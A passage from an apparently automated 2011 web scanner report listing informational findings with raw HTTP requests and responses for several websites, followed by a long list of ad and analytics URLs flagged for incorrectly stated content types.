Connection: keep-alive

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8">
<meta property="og:title" content="HITCON 2011 Hacks in Taiwan
...[SNIP]...

28.45. http://www.hitcon.org/hit2011/download.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hitcon.org
Path:	/hit2011/download.html

Request

Response

HTTP/1.0 200 OK
Date: Fri, 22 Jul 2011 07:51:34 GMT
Server: Apache/2.2.9
Last-Modified: Fri, 22 Jul 2011 07:16:28 GMT
ETag: "230266-22a3-4a8a33e778b00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 8867
Content-Type: text/html
Age: 6344
X-Cache: HIT from cuisinart.iis.sinica.edu.tw
X-Cache-Lookup: HIT from cuisinart.iis.sinica.edu.tw:80
Via: 1.0 cuisinart.iis.sinica.edu.tw:80 (squid/2.6.STABLE21)
Connection: keep-alive

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="UTF-8">
<meta property="og:title" content="HITCON 2011 Hacks in Taiwan
...[SNIP]...

28.46. http://www.lifescript.com/adcontrol.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lifescript.com
Path:	/adcontrol.htm

Request

Response

28.47. http://www.lifescript.com/html/comScore.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lifescript.com
Path:	/html/comScore.htm

Request

GET /html/comScore.htm HTTP/1.1
Host: www.lifescript.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/Doctor-Recommended_Tips_for_Women_with_ADHD.aspx
Cookie: __utma=22852774.274049985.1311276131.1311276131.1311276131.1; __utmb=22852774.12.10.1311276131; __utmz=22852774.1311276131.1.1.utmcsr=outbrain|utmccn=ADHD_Adult|utmcmd=cpc; __qca=P0-1418956191-1311276132113; scorecardresearch=835324677-1280137661-1311276133382; _opt_vi_5CJ4KHY3=322759EA-2C3C-4508-9327-2CFA81551AB4; _opt_vt_5CJ4KHY3=2D09EAA0A6; testcookie; ls_interstitial_vars=-1; __utmc=22852774; _opt_vs_5CJ4KHY3=322759EA-2C3C-4508-9327-2CFA81551AB4; DisqusPageLoad=2

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Tue, 19 Jul 2011 21:27:12 GMT
Accept-Ranges: bytes
ETag: "b2cf659f5a46cc1:1fea"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="CAO CNT COM CUR DEV DSP NAV OUR PSA PSD SAM STA TAI UNI"
Vary: Accept-Encoding
Date: Thu, 21 Jul 2011 19:33:26 GMT
Content-Length: 620
Connection: close

...
<script type="text/javascript">
try {
document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b
...[SNIP]...

28.48. http://www.nmmlaw.com/templates/nmm_2011/images/bg/spacer4.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nmmlaw.com
Path:	/templates/nmm_2011/images/bg/spacer4.jpg

Request

GET /templates/nmm_2011/images/bg/spacer4.jpg HTTP/1.1
Host: www.nmmlaw.com
Proxy-Connection: keep-alive
Referer: http://www.nmmlaw.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 375dab189ae785dd86afe53226bc8ecd=d48b5b854478fe967f99103e7fac9089

Response

HTTP/1.1 404 Not Found
Date: Sat, 23 Jul 2011 12:19:27 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.9
Last-Modified: Wed, 18 Aug 2010 15:55:07 GMT
ETag: "23c0240-b4-48e1b16f10cc0"
Accept-Ranges: bytes
Content-Length: 180
Content-Type: text/html

<HTML> <HEAD> <TITLE>404-not found</TITLE> </HEAD><BODY> <H1> Error occurred: 404 - not found</H1><HR><ADDRESS> Apache Server at: inst209.mycorphosting.com</ADDRESS></BODY> </HTML>

28.49. http://www.seashepherd.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.seashepherd.org
Path:	/

Request

Response

28.50. http://www.seashepherd.org/news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.seashepherd.org
Path:	/news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263

Request

Response

29. Content type incorrectly stated previous next
There are 132 instances of this issue:

http://a.rad.msn.com/ADSAdClient31.dll
http://a1.interclick.com/getInPageJS.aspx
http://a1.interclick.com/getInPageJSProcess.aspx
http://adadvisor.net/adscores/g.js
http://ads.adap.tv/beacons
http://ads.pointroll.com/PortalServe/
http://aka-cdn-ns.adtechus.com/apps/160/Ad1840288St3Sz154Sq20383166V2Id2/E-160x600.jpg
http://aka-cdn-ns.adtechus.com/apps/247/Ad1695991St3Sz170Sq20242213V6Id1/extFile1.js
http://amch.questionmarket.com/adscgen/st.php
http://articleonepartners.app7.hubspot.com/salog.js.aspx
http://attributiontrackingga.googlecode.com/svn/trunk/distilled.FirstTouch.js
http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://cache.boston.com/universal/js/sitelife/DirectProxy
http://cache.boston.com/universal/js/sitelife/SiteLifeProxy
http://cache.boston.com/universal/js/sitelife/SiteLifeScripts
http://catrg.peer39.net/443/131/66315943
http://consultants-locator.apple.com/favicon.ico
http://consultants-locator.apple.com/javascript/fancybox/jquery.fancybox-1.3.4.js
http://consultants-locator.apple.com/javascript/formatDate.js
http://consultants-locator.apple.com/javascript/jquery.js
http://consultants-locator.apple.com/javascript/jquery.tools.min.js
http://consultants-locator.apple.com/javascript/portal.1309219793.js
http://consultants-locator.apple.com/javascript/tooltips.js
http://consultants-locator.apple.com/javascript/treeview/treeview-min.js
http://consultants-locator.apple.com/javascript/wick.1295053156.js
http://consultants-locator.apple.com/javascript/yui/accordionview.js
http://consultants-locator.apple.com/javascript/yui/animation.js
http://consultants-locator.apple.com/javascript/yui/connection.1287529288.js
http://consultants-locator.apple.com/javascript/yui/container.1287529288.js
http://consultants-locator.apple.com/javascript/yui/dom.1287529288.js
http://consultants-locator.apple.com/javascript/yui/event.1287529288.js
http://consultants-locator.apple.com/javascript/yui/json.js
http://consultants-locator.apple.com/javascript/yui/utilities.js
http://consultants-locator.apple.com/javascript/yui/yahoo.1287529288.js
http://cs.wsj.net/community/content/images/misc/groups/otherquestionmark.25x25.png
http://cs.wsj.net/community/content/images/misc/members/defaultuser.50x50.png
http://event.adxpose.com/event.flow
http://geek.net/favicon.ico
http://go.ionearth.com/sites/all/themes/ionearth_base/js/cufon/cufon-replace.js
http://hipservice.live.com/gethip.srf
http://i3.silverlight.net/css/main.css
http://images.apple.com/global/nav/scripts/globalnav.js
http://images.apple.com/support/expresslane/data/properties.json
http://images.lifescript.com/images/button/sign-up.gif
http://images.lifescript.com/images/menu/subnavslice.gif
http://km.support.apple.com/kb/resources/js/ACShortcuts.js
http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate
http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo
http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur
http://mediacdn.disqus.com/1311382870/fonts/disqus-webfont.woff
http://my.seashepherd.org/NetCommunity/view.image
http://online.wsj.com/public/page/0_0_WC_HeaderWeather-10005.html
https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/Images/banner_01.gif
https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/Images/header_timeout.jpg
https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/Images/vs_img.gif
https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/images/banner_02.gif
https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/images/banner_bg.gif
http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/0badc71136ae076478bf83f1541081ef453a111b50cb3c0205ab52e9e820b250c59e028538eac0d71309572f0532760df61ffafd404f7f7ab96572302fa3ef4c6d5dc2c8cd1dc1a174788921c98221c53d967ba94189cac14a16e1f4053786961a7d48d1416a04630911413ae7cd25bf7f10707ad647ed34403ddb452b88e8846c648cd99df5c6f20b46880f9bb57eee5eae54eae4aefb7497150ad28a191670ac26b14d9dc24ee61c3e76cb42707268f260ed7c236543cc412c64472c1072fd236cab74511ddbbbf2526e65bd23f8eb5fa31b8a3212d5a23574333902101bcfc1e80b823a81ca1bc5dc9f7524b31d8674bfbd05ab898e36ca561f24d75e9cbba0646e1f09def18788d536fbb2e4d1097f346606f1ea29773e76a171d4fdcbcc241f33e8c92412a6c8c46f8c1c23faf2b4de0005d7bb03a656aa1e6c2c45a631db0d4de5f0aecaba1d66d217e1e28add9e4f9be3bd00db3412285787c900b2df5bc89de71a29c015b68fd911a704b7560ccb4bc5c899ac25da54e5b44e39dbef3f32d87c80f2a5b2885eb1ca74be75e769d072b660081d77084661fce65bdba0001c49f8d4fb2c8984048edab2fb9da97dab40eeb8c33e0267461c359d6bca5e7885045496d872995a0ef0948fe07b78583ea69e3dca935611c534fb9cacbf76f37e62c34fcc5be9d5e88df4a72430d41eb1a65b0c1c571a8eaf0f40f98fd7410db92b53a3cac79145a5ceaa5650c6e05e22b80403da493353bed5c8b31d09ff097cea50eb716193a69fd28bb5136a45a48c3402b5feac1ebc06cf5e3e73e24c4ca10c43eafd1886f08429f35962c20edeca367e3074915d5a0ca93443f0d8359b2904e55f2c8b109e75943f04ee5d8de83ef32be508211f8ee8f11e9ffa0e93ecf8aa9f4f9937140f7aeb761302bffba078554940735654b111b47f7616a372c4fe10bbcea7983c02ccadc9c9cee987ddba0049a140
http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2c5e2033352659b4256b88303a637cca8448ceb87a0ded8d123b613ac0c1963e359c05e0230e29156736c2a6895f3c1cffa64b9fac27801e8a9146b54a1ff52d056f7f32e3f3a71fef59a588e7f0624829dbaa6efa3b690eabde83297c9688e28391fc14aac6545983263c0c8e390b045be24a4caad2cb5ea74b1748fc205b3f2c51e89a461f341026e5795fcce4d3188e72b0232ca46e3f76599d9c6acfd4c41d4d07573dd137afaca4320220da7d25dd280c6db34bc4f161c396ddaf9d702beafd54328f8656d10a931162f8fb320b997e456b7f579ca99c3819174bdf432231b623d87320c20879e9063c31532f2265f999025ef6544ec230901b74370747a0cfb5f3be20a7d3377877f9bc09bdd0148dc46e6f5c65b2cf0325094b6eba36eca3f9526ef9c9f00876ab065933f067123a51f6a478170716e86c83bbee58dc85a1b26d6ede86650472a8da199989f4f7ce60ef9c141e96c196e2044d7833454dbb20b9f0ad7c5f92328dc654a9934521f753f31faa7515cab99f6833a9340ce09efd927b3aa9154c3e521fcc0ee3556124839da980882ad6cefd9a92b87de7656cc4de422fd9f9bd41bbc084dadd762251153a3b4ea20ae55445a1a722f24b304079665
http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2c5e2033352659b4256b88303a637cca8448ceb87a0ded8d123b613ac0c1963e359c05e0230e29156736c2a6895f3c1cffa64b9fac27801e8a9146b54a1ff52d056f7f32e3f3a71fef59a588e7f0624829dbaa6efa3b690eabde83297c9688e28391fc14aac6545983263dfcfe183b902c26fa198f06ba09a74dc2d9dd314b2d6c8508dea3ea30508261a98e8d5613198ac3f4f6b8900a8b429d8819b99f11c1286c93f298c572badd95c696558ae9f0c99d497d52c971f3e0f7b2083888543e6ee92552bb074324cf667406b8fde45caf3c467f0b914c19784cec701d3d05e456b7a7c87614163cebaa008bd1545932724ece727e96238e8230075b6457f76626cee344b850b051957897be8c1f6da1a57d0398488ac4b22e1520ac3f4bde8399f7a8351b3cace45d831e915c4710f2532b6611847917c6a1feab747acf995fa0b1c35acfa90764a5c73d9f9c7e9e35666936b95be268a691e613a4bd58e6465c4f449c067dc91a33b02cb7f5fc50816597a797f92a71317acc4e6c877dd64a176ecda3ca8c5f530bd8322e9d9886c1146642fd3837d98b60fb68cd74bf8bf660d8c25f653f384f1ec24d57e40d18f21654d1afde2a43ad80766763a393d378a95a0d0a114ed6dee18feed7d40ac5d0ca298b74e18fd1d1a155ec038416abf9f1eea7fb487fb6c4cd3de4974940d48f413ab82bd125c7b1672a09090b0aad5a03580d44ddca7dd662118f572e38d0a52debddfd1010b7ac77ea00b30e7d6e50bdd71d44bb0fa7c9ca97cb7c98759dfe110c8f926b84f7fe2a48e819f36ff35a52add046452e4a76c3c4b7372201bf28e1cb66933939d9eb370b4ec2371a52216521ce237a5025a929e90e89d6af40687cbc0702584030cf05d61fc1b22c03c88879220167fd372e6b1faba801a45bb5dff3979b5f9e390fdbd5ff32d9b38c418392fccbc6bbc1dd790bb34df9fe61c2c43167b4a49761cee929ad556e9e36bbefce42a567a2f0a159899683c1149d3c7e37c004f30c74e49a0c1db2fc70559da5ab0d39ef43a489a3c167fc58a6bf47ac8b8602d41daa4555422b04aad21da10153b36d4c5923938f2b980680fdb01acad38586f6ece725a00592aea2a58375258e7a0a7a0a7d056861c8a7f036048dde45accaebee81e8b590c7384fabc2406460ce1c717fad60bada7382eb45a59dad6a6688a02643faf905273500b953dcaa0fd0699e6149a42a232b96c331d8e6d4477fd288a05cadad7fe322863bf8e0c308e8e9dc5b37c7f551f385b4f81fb34dae9d43ef239f8db09a2ef033a7105c1d5bf3a55a54d02f0772cbfafc48b17ecddbff30e8eae3b6caf77a73f4c336a1ce8f591016ff28e90d7450a76eff8cc7c274d5395b3bfb37ca9eaa47d4509c0c77a3e7881a713f9cb55f87f5321ff05df064910caa8c724160e9a49c1a4b217d18c95278ab4cfa40ca940b8e60b37af23ae433288d77f95c5400e33e3045d46367e2ceadb721902cfb3e3864c75a44a2a781f6f95325d349fb1a86bbfe239f4d3341e9890f3ab4bb899564a0be17ef98767e00d3eefb6d6e2417d7ae832cfd6d6775d7d69f754c6700bd3abe3e49ec4918027f60f10dee733e46b9c3f938fb069edb7cfd750b193ef2551071a7d8ac6ff6ed1a8b1988fe45c826b90dec9cd98be5f70f6f26c5743c6b8da338df1e1a1710568ccdca3deeefd6cecbc2a1169135385aa5728f943096e4333826758a4ee7be95e4a05c6db118cd3622321809b9a68f0b572d54267545a7fb3ff1ebecc9419ad7886874a03f937bd4009938554e3e9b36a1e75600acf69685c778e2af7b9cfed919b9ffa2e2e60123cfc2105f300be6e1a9f531e925d6fe0b10bafc2321053f1cb703b4c2844fd046d64a5ea46269793d27ab574ec2c457529ae05027e30f656b8f0c83721cb335f67131a1d69ed15e43d788c71c1013089784d845dbb576169330c255e434662e219fd0ea3db8581b703d8e30b4d2b9e518223100f6c0c3ecfeac24f759bf6c55ced5d7422eb5d028332/1311280499290-658/0/5
http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2c5e2033352659b4256b88303a637cca8448ceb87a0ded8d123b613ac0c1963e359c05e0230e29156736c2a6895f3c1cffa64b9fac27801e8a9146b54a1ff52d056f7f32e3f3a71fef59a588e7f0624829dbaa6efa3b690eabde83297ca658e2d7e638f51a17253e62a7fffd4a2ddfe438d2ee59bea3af3a232c03dcc8157ea978d4cd6a469e343127057d7bfe8763abcf03c435b8b06a8ab33d387cfc8fe0b1591c96939835066ea984c697621aad753d89197c375e55d7965726d83b4895ae6fbc44d3386156e14a93305329fdc44d2e88220a0f96083aab5f2f573aa961511747130962c1f3596fdf71bb3193ae42434eee026e16838eb260177ad43797c740f8d5f3bef244e4d02877beec0eed21a54c73a858cb80a65ef4e0ac6f5b6e6389a728d52a5c1c554b951816fa4195e6332a868184bc6247e5ca0bb4da1acc1a40d522becaec2310e0c31999095a2a80828b056ab9c03e37463095c35d982474fadb20dcf11d5c0fd54438b6915985c221f253a4488812457fceea0e2208a37d705e8cb48a191a70496b47eb898e21b5713476f89d52ae4e03ae787d03e92ce12118b51f521e58ee99b45a4004facc00f7e411bfdf7bf72ef5b4f763d240430bd9da0f1fd50bf7fec1ffeed7c5eaf4d0cab82b74618fc19066d078507477aa29619ab55a1dad95356c9c36e44940b598d42e8c8b21344661472be8292b1a1c6a63f8fd75fabfb8e320302f966f8d0335dd9fae8ed1a0161d673a5426de980e140d9249f54b9ae7cddb678eb99834e88b401e3bd7cfd176abcf2c898ea3da938ea02fd032b05a4ae392c5343796647f9f619a63b3396cbd5b773e5a7682ef4735d054ab666be000592def0e7987efd138ecbd238178d0e4fd37d66b31237c93c9acfba33567bd066cffacab595151cae06ab6d729ef6e684f4a856f33fd31dcd511f2fca886dbd01c5b2fc09c386b9487841194e51556c07fbdb86ae14c1e47ca5e7ee115f65642747b6b33c64716dc8d7e5451a533fc75d35efefc023c6054cc175a0c0e7a76e16c3635633a4c832a122c4d4192148c8d21c7a13ee048512e77a6565319e98d9636de391d16707df56a8b9370d633ed0210e525b30e42258305d1a8cabd7cea8b82ca719883d77044ddae70e9cacaa8610de56150bd88aff5e5a631087b66082a379d8845a2eb64850a681927bf27c1850d0e311101405c606b0e0be4aeeb02a9d2aa453ae541b35866838078f5df377b3aca4af56301ed2e10741fe989086bb3d274d08755140b5bd219de0c366fa66a9f07efbe5105c146bb7b4df5032c3400792317aeda2f5d852e2d9ddad09d5ac4410d252c74728191d70d983a66906ea948cd65c1360f890bc25794b5985b4b7a226d0b4f62c1e51b2830a4102e0d87180e933865c39138267a5723569ac83b02c6a4a9b5fcfe1e94791c4b72bdcba808c2cae0fe1ac5761ea3b89037a8f9a77ce86305874b0140f432c7d30a78d231e07d9b5b5dd1c78fb595737317499335d2184f99f3796e23ee9ea33299090d2f70fea8b544c0be17fe78477e30c24eeb2d6e4456102b177f0d0c66a547a28dd419b4a28d7baefe295c3b38c69af4c4cd1e73a853ede7ddad2ee10b1ec9e8b05b997e27b145e5026d58be917968797cece9202e640a6f5f98be6cc4816a3c75a781a9ab88e7cabcbb4b20b0431998faadaeea764b9bb5c333b110b84a9260b83615f4e356380332e85906ff73f154ae8fd4cd48e731211ac899073fbf164904c2e1a1c69fde040b1978015bd2281c40050f262b00945da9f44b9f7b3671f525b37940c2f47709f34b9ff81f695c3e2e2373d7d0f3bbd2602ad1bf32f17af6f7fc51462fba01caa8a744b5dd9d92d25402542fb166e71fea0402f9bc9db60b660ec734e2f28b7160f6f0fc54aa4f6d96406ca3341711a2f5121a84db37b64c831f45c21e6295c9352ae51363f044f731959463ef64cb154b9c99cdbff0edce5185c24944dd96351282c1234d3e2c6542286d09804f44e7475ec4a15d026/1311280711520-955/0/4
http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2ceea0b244f73924150e4851eaf77c4af078ceac7bc95cfcd21f514bd03137fe24bd3210025f9ba446a7c715395e6bfcffb5aa0a8c52932e9aa046641bbef04c138c7e7220c0b48faf3be5b9a2a3035c1d5f4fc8aecf6c5e7bdfe70d4dd4d812839219001e57855c84e2eb1caf499b852de7fe58dea01e0ab09b67883d529bdc0cf0b98a461fc43117445cbad883473cee03f416c8d32ada22884c996d0b0221495dc6d7ee90829a38d4c2e2c4c9bd857c986ddad77b70879652b7fc2f7c45feee8af1975ae2e7c13ba32162f8f8c109497db37afed36d79585df8311cbd650572a2f68ce6b4b7f87e9be08ca7438f22d3bece727e96334e1260e70b0417d6f6e19f7283cf7721a3766fd0efddefab44c148a54c3d5dd2127eb3c0ebbfdd1f23b8e7a8b5caab8cb41d9289813c6784e6739b2620434950c6a04e7b34edffeeabf4d6435a7f283685e2810a98bd2ebf92875f20e89c243eb631a192345d6f03832d1c502bb17a0c3fc2041f96719e528410731647ebd8e0903a1ded0d379c664ff2483b557dcdae854a6b178adb3a32851295539da987585b60da096c27ae292501c8343f523f588e29747a50f49a9d67b3a700ce2e1b160b95921401a0f1c0f9cab86e0be1ef872fe04f3b23e03f80e58fbd0e61e00f50f196f7586781c6fb58b19ad5cbbd1bd080093f61802c74d03ff06ae9faa11306c1471e2c4c3f4f5c3a63d90d72ab4f9fc317c59f475fac679099ff198c350583afa7e8d3a70e8d4f716ac65c94bf5b92199a97ea8c9f21684b553e3f92baf4429bf81df9dee2df933a93ce001341af2f36d7d4e56273e12af8948a26965c79e80e130b4ce2b7ad130425140b173e70f0d82d1a9e49a3da947cd9ef56f42db505fab2d31f14a77956acbd3b763092bc067e5eef5b8c34e5af808d87a66e1aeb6c6a3ed0cac7fcd69910d44739cfe3cff4684dda24d9dc0b24c6935551f111f2d2bb89d9a9115caee67befaf360023c247a3bc6d7331a721293c7e2581f5920c0564ab4a9810d905f68c052a098b1f931438a705742b4d244b338d7ac52750eaf9d5d4335fd03e015cb4a2d203bcfc4867472a4bdb7055e9e44f2e57c5e7861c10c05513d74b7694e2f4b15d997f5f484a725e0138829586a488ab11d81b9db8278a4291770c7f3fb3b45704ae8d213f3d208a9f52650c72427c8d7f27f8d141958b29558715506805b8ba1f616e8e9698a38ad5ef7164173fd1c34079c5df57cbeaeacab5a2102c5e15a02bba2b9d9d53f26453f770e2cadae2fd9e0c464a664d4d708b2e9043d7719cda0be374dae3e049d685ab8fbd885639daaa6a07edbb5487ff662f166596c7968a8ead75522cbb386dd31620b8c9ec17a2a0802c7e8e4e63ba784ae764057a4d25447588c8b70d0bd5e9e0c35118f72a877636bb8d8a0357914a64dc0a2b0539f80e77bd4ec9ef67cf949bbec0a33bb27fc0771cbdd5a90ca581b5781767122516d3baa8e31031494e4ccc5156e9504123d5c2fc261782787bfd929ebb26daf8f606acfdea6ae5bc8fb305908f10fea8c659b1b4dfeaece9a220464d315ef9b9f3a5f6630d559da6539f5a8fed9b4f691846ea31a13ce8148891dfd4d9187a23abaa1d9c02dde9dd40970272f46bff78273ed8a9dbeb2e4719d47c18d9ff3ccec0b4ce0ee794a02eb94da378ffdcdeb1a4d77b6b9d3aef5fe7696e70b27355305dbec3b2ec9625d59696dd9137f95cd6ff73f3c76bbaa1b93d5657373d49e9d30a0b575d3426702087fe8af18e895cb4ef97f86841c01ac6bbd11568a0123cabc
http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2ceea0b244f73924150e4851eaf77c4af078ceac7bc95cfcd21f514bd03137fe24bd3210025f9ba446a7c715395e6bfcffb5aa0a8c52932e9aa046641bbef04c138c7e7220c0b48faf3be5b9a2a3035c1d5f4fc8aecf6c5e7bdfe70d4dd4d812839219001e57855c84e2eb1caf499b852de7fe58dea01e0ab09b67883d529bdc0cf0b98a461fc43117445cbad883473cee03f416c8d32ada22884c996d0b0221495dc6d7ee90829a38d4c2e2c4c9bd857c986ddad77b70879652b7fc2f7c45feee8af1975ae2e7c13ba32162f8f8c109497db37afed36d79585df8311cbd650572a2f68ce6b4b7f87e9be08ca7438f22d3bece727e96334e1260e70b0417d6f6e19f7283cf7721a3766fd0efddefab44c148a54c3d5dd2127eb3c0ebbfdd1f23b8e7a8b5caab8cb41d9289813c6784e6739b2620434950c6a04e7b34edffeeabf4d6435a7f283685e2810a98bd2ebf92875f20e89c243eb631a192345d6f03832d1c502bb17a0c3fc2041f96719e528410731647ebd8e0903a1ded0d379c664ff2483b557dcdae854a6b178adb3a32851295539da987585b60da096c27ae292501c8343f523f588e29747a50f49a9d67b3a700ce2e1b160b95921401a0f1c0f9cab86e0be1ef872fe04f3b23e03f80e58fbd0e61e00f50f196f7586781c6fb58b19ad5cbbd1bd080093f61802c74d03ff06ae9faa11306c1471e2c4c3f4f5c3a63d90d72ab4f9fc317c59f475fac679099ff198c350583afa7e8d3a70e8d4f716ac65c94bf5b92199a97ea8c9f21684b553e3f92baf4429bf81df9dee2df933a93ce001341af2f36d7d4e56273e12af8948a26965c79e80e130b4ce2b7ad130425140b173e70f0d82d1a9e49a3da947cd9ef56f42db505fab2d31f14a77956acbd3b763092bc067e5eef5b8c34e5af808d87a66e1aeb6c6a3ed0cac7fcd69910d44739cfe3cff4684dda24d9dc0b24c6935551f111f2d2bb89d9a9115caee67befaf360023c247a3bc6d7331a721293c7e2581f5920c0564ab4a9810d905f68c052a098b1f931438a705742b4d244b338d7ac52750eaf9d5d4335fd03e015cb4a2d203bcfc4867472a4bdb7055e9e44f2e57c5e7861c10c05513d74b7694e2f4b15d997f5f484a725e0138829586a488ab11d81b9db8278a4291770c7f3fb3b45704ae8d213f3d208a9f52650c72427c8d7f27f8d141958b29558715506805b8ba1f616e8e9698a38ad5ef7164173fd1c34079c5df57cbeaeacab5a2102c5e15a02bba2b9d9d53f26453f770e2cadae2fd9e0c464a664d4d708b2e9043d7719cda0be374dae3e049d685ab8fbd885639daaa6a07edbb5487ff662f166596c7968a8ead75522cbb386dd31620b8c9ec17a2a0802c7e8e4e63ba784ae764057a4d25447588c8b70d0bd5e9e0c35118f72a877636bb8d8a0357914a64dc0a2b0539f80e77bd4ec9ef67cf949bbec0a33bb27fc0771cbdd5a90ca581b5781767122516d3baa8e31031494e4ccc5156e9504123d5c2fc261782787bfd929ebb26daf8f606acfdea6ae5bc8fb305908f10fea8c659b1b4dfeaece9a220464d315ef9b9f3a5f6630d559da6539f5a8fed9b4f691846ea31a13ce9b559509e25dfcfbd4009bd0a6ab2fd99dc90968212c30d6909c49c7b7bc8e92cd4efa418cd8d6d7c0c61d01bfa3526d65ecd98f7eabf1e7fd57123a9d9eb4a9a5a135afe7073b1e411ed8ba394ff6540c0f3a2082352ad19978ec7c4215eebb15d7d7642621849e9a30aab127d2173507592feeec01faa3a625881da4921411f46bbd11568a039c7d6d
